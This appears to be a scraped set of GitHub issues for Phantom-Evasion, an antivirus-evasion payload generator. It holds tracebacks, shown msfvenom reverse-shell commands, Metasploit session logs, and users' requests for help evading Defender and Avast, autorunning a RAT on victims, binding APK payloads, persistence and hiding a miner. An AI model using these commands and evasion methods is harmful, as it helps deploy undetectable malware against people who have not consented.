oddcod3 / phantom-evasion Goto Github PK

I am getting this error everytime I reach the "Insert the certificate spoofing target(default: www.microsoft.com:443):

Here is the error:

[>] Sign executable? (y/n):y

[>] Insert certificate spoofing target (default: www.microsoft.com:443): www.microsoft.com:443
Traceback (most recent call last):
File "./phantom-evasion.py", line 718, in
complete_menu()
File "./phantom-evasion.py", line 175, in complete_menu
Phantom_lib.shellcode_completer(module_type)
File "Setup/Phantom_lib.py", line 1538, in shellcode_completer
module_launcher1(module_type)
File "Setup/Phantom_lib.py", line 1425, in module_launcher1
auto_compiler(module_choice,Arc,output_filename)
File "Setup/Phantom_lib.py", line 1242, in auto_compiler
exe_signer(filename)
File "Setup/Phantom_lib.py", line 422, in exe_signer
cert.set_notBefore(x509.get_notBefore())
File "/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 1328, in set_notBefore
return self._set_boundary_time(_lib.X509_get_notBefore, when)
File "/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 1315, in _set_boundary_time
return _set_asn1_time(which(self._x509), when)
File "/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 120, in _set_asn1_time
set_result = _lib.ASN1_TIME_set_string(boundary, when)
AttributeError: 'module' object has no attribute 'ASN1_TIME_set_string'

Do I have to update something?

@oddcod3 I got the following while generating android payload

While obfuscating smali code then is an exception

Payload that I use: android/meterpreter/reverse_tcp

My payload is undetectable but my msfvenom meterpreter (windows/vncinject/reverse_tcp) get detected! I also encoded it with with x86/shikata_ga_nai + Triple Multibyte-key xor ..but soon as the meterpreter session opens , windows detect it and he kills it.

Can somebody help me ?
My problem is:
When I open the phantom evasion, two problems appear, the first problem says: [>] Package libc6-dev-i386 [Not found]. And the second says: [Wine] Python not found.
and I press Enter twice, because the same error appears again, then the program opens apparently normal, but when I finish creating the back door, an error appears, and the backdoor is not created.
Help me please, I can not create a back door.
NOTE: I downloaded the latest version of python (version 3).
PHOTOS:
https://ibb.co/dRfYno: first error
https://ibb.co/ezwv08: second error

--smallest option is being used with -e x86/shikata_ga_nai and they are not compatible.

-e x86/shikata_ga_nai should be removed.

Hi, I have problem with Phanton-evasion. I created x64 payload for reverse_https. I tried options 8,9,19,11,12 but dont work. Meterpreter session opened but no shell reverse_https. I turn off AV.

When i use, msvenom meterpreter run with shell, when i use phantom meterpeter not open shell :(

logs bellow:

[>] Please insert LHOST: 172.21.65.139

[>] Please insert LPORT: 443

[>] Please insert output filename: 12

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.

Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): n

[>] Generating C meterpreter stager

[>] Compiling...

[>] Strip

strip is a GNU utility to "strip" symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)

[>] Strip executable? (y/n):n

[>] Sign Executable

Online Certificate spoofer & Executabe signer (Lower rate of detection)

[>] Sign executable? (y/n):n

[<>] File saved in Phantom-Evasion folder

[>] Press Enter to continue

#############################################################################

   =[ metasploit v5.0.2-dev                           ]

• -- --=[ 1853 exploits - 1046 auxiliary - 325 post ]
• -- --=[ 541 payloads - 44 encoders - 10 nops ]
• -- --=[ 2 evasion ]
• -- --=[ ** This is Metasploit 5 development branch ** ]

[*] Starting persistent handler(s)...
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > run

[] Started HTTPS reverse handler on https://0.0.0.0:443
[] https://0.0.0.0:443 handling request from 10.29.196.29; (UUID: yfoqefyb) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (172.21.65.139:443 -> 10.29.196.29:62327) at 2019-01-29 05:38:06 -0500
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf5 exploit(multi/handler) > run

[] Started HTTPS reverse handler on https://0.0.0.0:443
[] https://0.0.0.0:443 handling request from 10.29.196.29; (UUID: xrjzst41) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (172.21.65.139:443 -> 10.29.196.29:62392) at 2019-01-29 05:41:35 -0500

Hello, when using the tool, in the part that asks for the file name, when I inform, I get the following error:

Traceback (most recent call last):
File "./phantom-evasion.py", line 492, in
complete_menu ()
File "./phantom-evasion.py", line 260, in complete_menu
Phantom_lib.shellcode_completer (module_type)
File "Setup / Phantom_lib.py", line 961, in shellcode_completer
module_launcher1 (module_type)
File "Setup / Phantom_lib.py", line 882, in module_launcher1
Payload = payload_generator (payload_choice, Arc, commtype, port, "c")
UnboundLocalError: local variable 'commtype' referenced before assignment

I would like to know how to solve this problem, Thanks in advance.

no session started on making sessions with:
osx/x64/meterpreter/reverse_tcp
osx/meterpreter/reverse_tcp

When executing dmg file on victim machine, image not recognized error.

i'm trying to encode my miner to make it less detectable by converting it to shellcode then compile it using your module but so far i'm unsuccessfully

the miner no longer work after compile and getting the outputfile

also when choosing from Encoding step rather than none i get this error
`[>] Generating code...

Traceback (most recent call last):
File "Modules/payloads/Polymorphic_MHA_NDC_LLGPA_mathinject_windows.py", line 40, in
DecodeKit = encoding_manager(Encryption,Payload,Randbufname)
File "Modules/payloads/auxiliar/usefull.py", line 76, in encoding_manager
Payload = Multibyte_xor.Xor_stub2(Shellcode,Randbufname)
File "Modules/payloads/encryption/Multibyte_xor.py", line 84, in Xor_stub2
encrypted_shellcode=xor_encryption(shellcode.decode('string-escape'),key)
ValueError: invalid \x escape
`
working on kali

[>] Please type the number of the payload do want to use: python/meterpreter/reverse_tcp

[>] Please insert LHOST: 192.168.1.111

[>] Please insert LPORT: 4444

[>] Generating code...

No encoder or badchars specified, outputting raw payload
Payload size: 454 bytes

[>] Please insert output filename:payload
Traceback (most recent call last):
File "Modules/payloads/Pytherpreter_10^8++.py", line 31, in
Randflag = usefull.varname_creator()
AttributeError: 'tuple' object has no attribute 'varname_creator'
824 INFO: PyInstaller: 3.4
832 INFO: Python: 2.7.15
842 INFO: Platform: Windows-7-6.1.7601-SP1
858 INFO: wrote Z:\pentest\Phantom-Evasion\payload.spec
903 INFO: UPX is not available.
Traceback (most recent call last):
File "c:\Python27\lib\runpy.py", line 174, in run_module_as_main
"main", fname, loader, pkg_name)
File "c:\Python27\lib\runpy.py", line 72, in run_code
exec code in run_globals
File "C:\Python27\Scripts\pyinstaller.exe_main.py", line 9, in
File "c:\Python27\lib\site-packages\PyInstaller_main.py", line 111, in run
run_build(pyi_config, spec_file, **vars(args))
File "c:\Python27\lib\site-packages\PyInstaller_main_.py", line 63, in run_build
PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs)
File "c:\Python27\lib\site-packages\PyInstaller\building\build_main.py", line 838, in main
build(specfile, kw.get('distpath'), kw.get('workpath'), kw.get('clean_build'))
File "c:\Python27\lib\site-packages\PyInstaller\building\build_main.py", line 784, in build
exec(text, spec_namespace)
File "", line 17, in
File "c:\Python27\lib\site-packages\PyInstaller\building\build_main.py", line 189, in init
raise ValueError("script '%s' not found" % script)
ValueError: script 'Z:\pentest\Phantom-Evasion\payload.py' not found
Traceback (most recent call last):
File "./phantom-evasion.py", line 435, in
complete_menu()
File "./phantom-evasion.py", line 322, in complete_menu
Phantom_lib.pytherpreter_completer(module_type,"False")
File "Setup/Phantom_lib.py", line 667, in pytherpreter_completer
pytherpreter_launcher(Paytime,module_type,wine)
File "Setup/Phantom_lib.py", line 706, in pytherpreter_launcher
auto_pyinstall(Filename,wine)
File "Setup/Phantom_lib.py", line 756, in auto_pyinstall
os.rename(bwd,filename)
OSError: [Errno 2] No such file or directory

According to the README, the Timebases Persistence Method checks for a specific process name to be running.
This is a major problem if you're using the PrependMigrateProc option to lets say the svchost.exe process, of which Windows spawns multiple processes by default.
Thats why you will never be able to tell if the process is still running.

There is a much better way:
The meterpreter process could simple lock a specific file (for example the own executable), and the KeepAlive process could check if there is a lock on this file.
If the meterpreter process would die, windows will automatically remove the lock.

• Issue 1
  Something I noticed was that if the reverse_tcp meterpreter session died, it didn't spawn/create a new one. If this isn't in it yet, it is really important to add this quick.
  I know there is a post-exploitation module that should implement this but I'm not sure if that works correctly.

Rerunning the reverse_tcp shellcode every x second needs to be in the File itself! Any persistence as second file is not good. Starting the main file itself is very cpu intense due to the av bypass methods. Thats why it needs to be inside!
Like this:

main(){

    junkcode()
    custom_shellcode="..."

    for(;;) {
      execute_shellcode()
      delay(10000);
    }

}

Keeping the process alive is important, but its also important that the process itself reconnects if errors happen, otherwise the process would be still alive but with broken connection >> no shell

-
-

–> Will be implemented

• Issue 2
  It would be nice to add other options besides LHost and LPort like PrependMigrate and PrependMigrateProc, just like you would in msfvenom.

  I tried to bypass this by creating c shellcode with msfvenom and choosing it instead of the default meterpreter in Phantom-Evasion but it didn't work. (compiling worked but didn't connect)
  I pasted the shellcode as oneline. Was that the correct way?
  (see this other issue)

hi,

if you select a stageless payload, such as windows/x64/meterpreter_reverse_https, phantom-evasion will crash during the XOR encryption with the following error:

OSError: [Errno 7] Argument list too long

probably the stageless payload is bigger than ARGV argument size limit.

hi,

it would be nice to have a container ready to use on Docker Hub. (https://hub.docker.com)

It's undetectable up till windows 10 v1709 but in v1803 it was detected by windows defender.Any workaround to evade it.Version 1.0 released will retest it

Everything runs fine except when trying to resign the apk... It gives output unable to open resigned.apk as zip archive... Caused by java.lang.ClassNotFoundException: sun.misc.BASE64Encoder.

Greetings,

I would like to say thanks for such a nice tools. I tried x64 payload for windows but failed to generate it. I think there is an issue with x64 bit platform.

One more thing Ive seen even Ive choosen N for miner but when ever I use a payload generate via phatom my av popup after a while saying CryptoMiner.Gen C:\Users\tehseen\AppData\Local\Google\Chrome\User Data\Default\Cache\f_008345

after a while av will traceout the generated payload too. Kindly look into this issue.

Avira and windows defender both detecting this.

Regards
Tehseen

I am missing somthing because i cant seem to install this onto my machine.
Could you please help?

My distro is not included in the "Compatible, but ParrotSec is a Kali-based Pen Testing.
I'm just confused as to install the needed modules. I tried "sudo apt install -f", but no help.
Please and thank you.

UPDATE:
I tried this method, but got the same results.
Install both 2.7 versions.
https://superuser.com/questions/328216/install-python-pywin32-in-wine

see:

• https://www.veil-framework.com/how-to-safely-check-veil-payloads-against-virustotal/
• https://github.com/mubix/vt-notify
• https://www.virustotal.com/en/documentation/public-api/#getting-file-scans

I have perfectly installed Veil

I'm unable to bind a payload I don't know what the issue is. Can anyone please help to solve the issue.
This is the error I'm getting every time.

[>] Smaling...

I: Using Apktool 2.3.3
brut.directory.PathNotExist: apktool.yml

[>] Please insert output filename: kuchbhi.apk
Traceback (most recent call last):
File "phantom-evasion.py", line 441, in
complete_menu()
File "phantom-evasion.py", line 295, in complete_menu
Phantom_lib.droidmare_launcher()
File "Setup/Phantom_lib.py", line 1799, in droidmare_launcher
apksigner()
File "Setup/Phantom_lib.py", line 1635, in apksigner
os.rename('msf_rebuild.apk',Apk_out)
OSError: [Errno 2] No such file or directory

[] choose how to supply shellcode:

[1] Msfvenom

[2] Custom shellcode

[0] Back

[>] Please insert option: 2

[>] Please enter custom shellcode (example: \xff\xbc\xb9\a6 ): \xff

[>] Enter output filename: w

[>] Please insert compiler option (x86 or x64): x86

[>] Encoding step:

[1] None (none)

[2] Multibyte-key xor (good)

[3] Double Multibyte-key xor (excellent)

[4] Triple Multibyte-key xor (excellent)

[>] Please enter options number: 1

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.

Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code
PRO: Longer execution time,Lower rate of detection.

[>] Add multiple processes behaviour?(y/n): n

[>] Generating code...

Traceback (most recent call last):
File "Modules/payloads/ShellcodeInjection_heap_windows.py", line 35, in
SpawnMultiProc = int(sys.argv[1])
ValueError: invalid literal for int() with base 10: ''

the payload i created did gave me the meterpreter access of the target machine, I am unable to make it persistence

The first "Windows Persistence RegCreateKeyExW Add Registry Key" Post-Exploitation Module asks for 'insert file path to add to startup', i'm unable to understand which file and its path does it need
The payload in the kali or the one in target machine
i tried adding the kali path of payload and uploaded and executed the file through meterpreter but the payload didn't started once i restarted the target machine.
Please help

some way to put metasploit fud ??

Hi, I try to bind an msf payload (android/meterpreter/reverse_tcp) to an APK. In the log all seem to be good but after starting a listener I install the app and start it. No connection on the listener.

I used windows modules then used option 3 (Windows Polymorphic Multipath VirtualAlloc NoDirectCall GPA/GMH) and also option 6 (Windows Polymorphic Multipath Heapalloc NoDirectCall GPA/GMH).Tried with x86 and x64 but I didn't get any session.

target windows win 10 v1803 and v1709.
using kali linux 2018.2

Running it on MacOS itself works fine, but after you have chosen every option and its finally generating/compiling the file and it says 'Saving file to Phantom-Evasion Folder', it doesn't actually save any file.

Unable to open 'resigned.apk' as zip archive
Traceback (most recent call last):
File "phantom-evasion.py", line 422, in
complete_menu()
File "phantom-evasion.py", line 276, in complete_menu
Phantom_lib.droidmare_launcher()
File "Setup/Phantom_lib.py", line 1552, in droidmare_launcher
os.remove("msf_rebuild.apk")
OSError: [Errno 2] No such file or directory: 'msf_rebuild.apk'

getting this error when I tried to run phantom-evasion.py (tried executing with both python and ./ command) Sorry if im just retarded, im a beginner.

Error:

Traceback (most recent call last):
File "./phantom-evasion.py", line 32, in
import Phantom_lib
File "Setup/Phantom_lib.py", line 28, in
from OpenSSL import crypto
ImportError: No module named OpenSSL

Is there a working method to make the RAT autorun by the target (windows) machine?

For instance say I download the file from a server on my target windows machine, is it possible to configure the script to autorun after download?

Please add 32 bit and 64 bit windows/meterpreter/reverse_https polymorphic stager as tcp and http are easily detected by windows defender.

the file apk created by Phantom-Evasion in device
The generated file is identified by Google protect.

Sadly the Payload still gets detected by IKARUS AV and many others.
At least the Pure C meterpreter/reverse_tcp

VirusTotal Link

I have a problem. Every payload that I create for Windows detects even free Avast. What am I doing wrong? I tried various options for Windows. I will paste one of them below so that you can see exactly.

I tried - Windows modules -> Shellcode Injection or Stager -> I've probably tried all the options for these modules.

Can you tell me what I'm doing wrong? ;)

[] choose how to supply shellcode:

[1] Msfvenom

[2] Custom shellcode

[0] Back

[>] Please insert option: 1

[>] Please enter msfvenom payload (example: windows/meterpreter/reverse_tcp):windows/meterpreter/reverse_https

[>] Please insert LHOST: 192.168.51.2

[>] Please insert LPORT: 443

[>] Custom msfvenom options(default: blank):

[>] Encoding step:

[1] x86/xor_dynamic (average)

[2] x86/xor_dynamic + Multibyte-key xor (good)

[3] x86/xor_dynamic + Double Multibyte-key xor (excellent)

[4] x86/xor_dynamic + Triple Multibyte-key xor (excellent)

[>] Please enter options number: 4

[>] Enter output filename: michal-443

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.

Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): y

[>] Insert number of decoy processes (integer between 1-3): 2

[>] Generating code...

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/xor_dynamic
x86/xor_dynamic succeeded with size 519 (iteration=0)
x86/xor_dynamic chosen with final size 519
Payload size: 519 bytes
Final size of c file: 2205 bytes

[>] Triple-key Xor multibyte encoding...

[>] Compiling...

[>] Strip

strip is a GNU utility to "strip" symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)

[>] Strip executable? (y/n):y

[>] Stripping...

[>] Sign Executable

Online Certificate spoofer & Executabe signer (Lower rate of detection)

[>] Sign executable? (y/n):y

Certificates directory is not empty , use already existing certificate? (y/n): n

[>] Insert certificate spoofing target (default: www.microsoft.com:443): www.google.com:443

[>] Insert sign software description (default: Notepad Benchmark Util):

[>] Signing m443.exe with osslsigncode...

[>] Succeeded

[<>] File saved in Phantom-Evasion folder

There is a typo in the phantom_lib.py file at the two lines listed in the subject. This is the error thrown
Traceback (most recent call last):
File "phantom-evasion.py", line 718, in
complete_menu()
File "phantom-evasion.py", line 175, in complete_menu
Phantom_lib.shellcode_completer(module_type)
File "Setup/Phantom_lib.py", line 1543, in shellcode_completer
module_launcher2(module_type)
File "Setup/Phantom_lib.py", line 1466, in module_launcher2
Proc_arch == "x64"
NameError: global name 'Proc_arch' is not defined

I have fixed it by removing a single "="

Figured it may be useful for others getting similar errors.

Hello,

I am unable to get Phantom-Evasion to spawn a session a meterpreter session. I've generated a reverse_http payload using msfvenom that works and to see what the executable runs I ran a Netcat sesion on the LPORT specified. This is the output that it gives:

root@metaserver:~# nc -l -p 80 -v
listening on [any] 80 ...
connect to [x.x.x.x] from somehost [y.y.y.y] 55018
GET /Ap3DYbrymVBexF_FA4HrQwhp2ukn0z8302GFyFmx7XWCxWK9YXCGx1ge3I-xSVcq HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Connection: Keep-Alive
Cache-Control: no-cache

When I run the executable generated from Phantom-Evasion and run a Netcat on the host it gives me the following:

root@metaserver:~# nc -l -p 80 -v
listening on [any] 80 ...
connect to [x.x.x.x] from somehost [y.y.y.y] 55116
GET /Mcy3 HTTP/1.1
Accept-Encoding: identity
Host: x.x.x.x:80
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT

The msfvenom command I use to generate the reverse_http payload is:

msfvenom --encoder cmd/powershell_base64 --payload windows/meterpreter/reverse_http LHOST=x.x.x.x LPORT=80 --arch x86 --platform win --format exe --out ~/reveresh.exe

The msfconsole output for the working msfvenom generated payload is:

     =[ metasploit v5.0.40-dev-                         ]

• -- --=[ 1914 exploits - 1072 auxiliary - 330 post ]
• -- --=[ 556 payloads - 45 encoders - 10 nops ]
• -- --=[ 4 evasion ]

[] Processing ./automate.rc for ERB directives.
resource (./automate.rc)> use multi/handler
resource (./automate.rc)> set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
resource (./automate.rc)> set LHOST x.x.x.x
LHOST => x.x.x.x
resource (./automate.rc)> set LPORT 80
LPORT => 80
resource (./automate.rc)> set ExitOnSession false
ExitOnSession => false
resource (./automate.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (./automate.rc)> exploit -j
[] Exploit running as background job 0.
[] Exploit completed, but no session was created.
[] Starting persistent handler(s)...

[] Started HTTP reverse handler on http://x.x.x.x:80
msf5 exploit(multi/handler) > [] http://x.x.x.x:80 handling request from y.y.y.y; (UUID: ghbljues) Encoded stage with x86/shikata_ga_nai
[] http://x.x.x.x:80 handling request from y.y.y.y; (UUID: ghbljues) Staging x86 payload (180854 bytes) ...
[] Meterpreter session 1 opened (x.x.x.x:80 -> y.y.y.y:55150) at 2019-08-08 23:53:28 -0400

The msfconsole output for the Phantom-Evasion generated payload which never accepts the payload is:

   =[ metasploit v5.0.40-dev-                         ]

• -- --=[ 1914 exploits - 1072 auxiliary - 330 post ]
• -- --=[ 556 payloads - 45 encoders - 10 nops ]
• -- --=[ 4 evasion ]

[] Processing ./automate.rc for ERB directives.
resource (./automate.rc)> use multi/handler
resource (./automate.rc)> set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
resource (./automate.rc)> set LHOST x.x.x.x
LHOST => x.x.x.x
resource (./automate.rc)> set LPORT 80
LPORT => 80
resource (./automate.rc)> set ExitOnSession false
ExitOnSession => false
resource (./automate.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (./automate.rc)> exploit -j
[] Exploit running as background job 0.
[] Exploit completed, but no session was created.
[] Starting persistent handler(s)...

[*] Started HTTP reverse handler on http://x.x.x.x:80

It never begins a session which I believe has something to do with the Netcat output from above. I have tried every reverse_http option available in both X86 and X64.

Does anyone have any ideas?

Thanks in advance!

How to convert shellcode form \x00 to 0x00 ?

As part of the automatic setup and dependency check, Phantom-Evasion installs xmr-stak Monero crypto currency miner. I know you mention as much in the README of the repository but simply installing it and turning it on by default seems disingenuous at best and actively malicious at worst.

If you insist on including the miner, i think more transparency with regards to this would be beneficial. I would suggest that after running the setup procedure and installing all the dependencies required by the tool you prompt the user and ask something along the lines of:

In order to support the developer of this tool/framework, you can help out by allowing the program to install a Monero Miner along side the program's main functionality. The miner will be configured to use a low amount of system resources and can be deactivated at any time should you wish to do so.

Then clearly ask the user whether they agree to this or not. If they agree, great, if they don't, don't call the function and related operations in the Phantom_lib.py file and simply provide the core functionality of Phantom-Evasion as is.

Just my two cents.

It would be great if you add persistence option as well.

Regards
Tehseen

First of all, yes I know this isn't an issue and this probably isn't the right place for this.
So if anyone can help, I would really appreciate it, otherwise just ignore.

I'm trying to modify the source code for myself to test new things.
Therefore I used the HeapAlloc module, ran the python script, decoded the source.c file and removed all Junkcode and WinEvasion Code.

This is the code I ended up with:
Source.c

Question:

1. What line/command actually executes the shellcode?
2. What are the smaller shellcodes about?

Even when using alternative payloads to msfvenom this payload is now detectable by AV software.

.gitignore should be improved to ignore generated files.

Running into this while attempting to download payload via browser:

Does anyone know of a method to bypass this?

I thought signing the application would bypass but the error still outputs "Unknown Publisher".

I cant run phantom properly beacuse it says pyinstaller is not installed but is it, so maybe wrong pyinstaller version?

This is fresh new summary of this old issue

A lot of people had issues with creating custom shellcode and using it.

What is the goal:
Create a 64bit shellcode (reverse_tcp) and using it with Phantom-Evasion

Previous tries:

• Veil doesn't support 64bit (32bit didn't work for me)
• Using msfvenom (connected on 32bit, but instantly died. 64bit not at all)
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0d" > outfile
  (used windows/x64/meterpreter/reverse_tcp of course at 64bit in listener and generator)

Question:
Can anyone who got this working post a detailed list of steps he did to achieve this?
Something like:

• What Shellcode Generator? (eg. Veil, msfvenom, etc.)
• What Encoders for shellcode? (eg. None, Xor, etc.)
• What Badchars?
• What Modules? (eg. HeapAlloc, VirtualAlloc, etc.)
• What Encoders in Phantom-Evasion?
• etc.

Maybe @oddcod3 already tested this!

Hi All,

Spun up a brand new Kali install:

Linux 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 GNU/Linux

Then performed the following actions to spin up the environment:

git clone https://github.com/oddcod3/Phantom-Evasion.git
cd Phantom-Evasion
chmod u+x phantom-evasion.py
python3 phantom-evasion.py

This worked fine, I generated a payload, seems to work.
Gracefully quit the application.

Upon attempting to relaunch the application I'm hitting the following error at the Wine Environment Check:

[>] Python Version: 3.6.8

[>] Kali-Rolling Detected!!

[>] Checking dependencies:

[>] Package libc6-dev-i386               [Found]

[+] apktool                              [Found]
[+] apktool.jar file                     [Found]
[+] gcc                                  [Found]
[+] mingw-w64                            [Found]
[+] pyinstaller                          [Found]
[+] apksigner                            [Found]
[+] metasploit-framework                 [Found]
[+] strip                                [Found]
[+] osslsigncode                         [Found]
[+] Wine Environment check
Traceback (most recent call last):
  File "phantom-evasion.py", line 709, in <module>
    Phantom_lib.dependencies_checker()
  File "Setup/Phantom_lib.py", line 296, in dependencies_checker
    kali_parrot_isready()
  File "Setup/Phantom_lib.py", line 204, in kali_parrot_isready
    wine_check()
  File "Setup/Phantom_lib.py", line 510, in wine_check
    if "cannot find" in py_check:
TypeError: a bytes-like object is required, not 'str'

Can't seem to get past this and not sure what the actual issue here is.
Any help would be appreciated.

Cheers,

Hello,

I got this error in the middle of the instalation process, Im running Debian 9, the wine python version is 3.4

] Trying to autoinstall:

Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
libc6-dev-i386 : Depends: libc6-i386 (= 2.24-11+deb9u3) but 2.27-6 is to be installed
Depends: libc6-dev (= 2.24-11+deb9u3) but 2.27-6 is to be installed
Recommends: gcc-multilib but it is not going to be installed
E: Unable to correct problems, you have held broken packages.
[+] apktool [Found]
[+] apktool.jar file [Found]
[+] gcc [Found]
[+] mingw-w64 [Found]
[+] pyinstaller [Found]
[+] apksigner [Found]
[+] openssl [Found]
[+] strip [Found]
[+] wine [Found]
[+] Wine Environment check
[Wine] Python Found
[Wine] Pyinstaller Found
[>] Metasploit-Framework [Found]

[>] Completed!!

[DISCLAIMER]:Phantom-Evasion is intended to be used for legal security
purposes only any other use is not under the responsibility of the developer

[+] Developed by: Diego Cornacchini

[+] GITHUB: https://github.com/oddcod3

[+] VERSION: 1.2

[+] MODULES: 24

[+] NEW FEATURES: Pure C meterpreter stager,Persistence modules

Traceback (most recent call last):
File "./phantom-evasion.py", line 439, in
Phantom_lib.xmr_miner()
File "Setup/Phantom_lib.py", line 614, in xmr_miner
subprocess.call(['tmux','send-keys','-t','phantom-miner','"\x03"','C-m'], stdout=open(os.devnull,'wb'), stderr=open(os.devnull,'wb'))
File "/usr/lib/python2.7/subprocess.py", line 172, in call
return Popen(*popenargs, **kwargs).wait()
File "/usr/lib/python2.7/subprocess.py", line 394, in init
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory

it is possible, i have done it on my own copy, e.g. mingw-w64 osslsigncode can be brew installed + you can detect OSX via platform.system() == "Darwin"

steps to reproduce:

1. Windows Modules
2. Windows Shellcode Injection VirtualAlloc NoDirectCall LL/GPA
3. Payload: windows/x64/meterpreter/reverse_https
4. Encoder: x64/xor + Triple Multibyte-key xor
5. Add multiple processes behaviour? y, 3

result: